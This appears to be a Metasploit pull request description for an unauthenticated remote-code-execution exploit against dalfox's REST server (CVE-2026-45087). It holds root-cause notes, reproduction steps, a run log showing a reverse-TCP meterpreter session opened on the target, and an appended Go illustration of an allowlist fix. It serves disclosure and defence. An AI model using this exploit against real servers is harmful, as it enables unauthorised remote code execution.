Add Dalfox Unauthenticated RCE module (CVE-2026-45087)#21493

Open: Takahiro-Yoko wants to merge 2 commits into rapid7:master from Takahiro-Yoko:dalfox_server_rce_cve_2026_45087

Conversation

@Takahiro-Yoko (Contributor)

CVE-2026-45087

Vulnerable Application

When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.

The vulnerability affects:

* dalfox <= 2.12.0

This module was successfully tested on:

* dalfox 2.12.0 on Ubuntu 24.04

Installation

  1. go install github.com/hahwul/dalfox/v2@v2.12.0
  2. export PATH=$PATH:$(go env GOPATH)/bin
  3. dalfox server

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/dalfox_server_rce_cve_2026_45087
  4. Do: run lhost=<lhost> rhost=<rhost>
  5. You should get a meterpreter

Scenarios

msf > use exploit/linux/http/dalfox_server_rce_cve_2026_45087
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/dalfox_server_rce_cve_2026_45087) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Dalfox detected.
[*] Using URL: http://192.168.56.1:8081/mcpYksL
[*] Server started.
[*] Sending stage (3090404 bytes) to 192.168.56.16
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40642) at 2026-05-24 09:30:54 +0900
[*] Server stopped.

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : vul
OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
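The Vulnerable Application section above describes the root cause as POST /scan deserializing attacker-supplied JSON directly into model.Options, with FoundAction and FoundActionShell carried through into the scan. The Go snippet below is an added illustration, not code from this PR or from dalfox, contrasting that pattern with an allowlist decoder that can never populate the hook fields from a request. The Options struct, its JSON key names and the function names are assumptions for the example.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
)

// Options stands in for dalfox's model.Options; only the fields needed here
// are modelled, and the JSON key names are an assumption for this example.
type Options struct {
	URL              string `json:"url"`
	FoundAction      string `json:"found-action"`
	FoundActionShell string `json:"found-action-shell"`
}

// DecodeUnsafe is the pattern the advisory describes: the body is deserialized
// straight into the internal struct, so the shell hook fields are attacker-set.
func DecodeUnsafe(body []byte) (Options, error) {
	var opts Options
	err := json.Unmarshal(body, &opts)
	return opts, err
}

// scanRequest is the allowlist of fields the endpoint is meant to accept.
type scanRequest struct {
	URL string `json:"url"`
}

// DecodeScanRequest decodes into the allowlist struct, rejects unknown keys,
// and builds Options server-side so hook fields never come from the request.
func DecodeScanRequest(body []byte) (Options, error) {
	dec := json.NewDecoder(bytes.NewReader(body))
	dec.DisallowUnknownFields()
	var req scanRequest
	if err := dec.Decode(&req); err != nil {
		return Options{}, fmt.Errorf("rejecting scan request: %w", err)
	}
	if req.URL == "" {
		return Options{}, fmt.Errorf("rejecting scan request: url is required")
	}
	return Options{URL: req.URL}, nil
}

func main() {
	body := []byte(`{"url":"http://127.0.0.1/","found-action-shell":"/bin/sh"}`) // constructed sample, not a real capture
	loose, _ := DecodeUnsafe(body)
	_, err := DecodeScanRequest(body)
	fmt.Printf("unsafe: hook=%q; allowlist: %v\n", loose.FoundActionShell, err)
}
```

The same allowlist idea applies to any field of an internal options struct that drives command execution or file writes: decode only what the endpoint is documented to accept, then construct the internal struct from those values.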
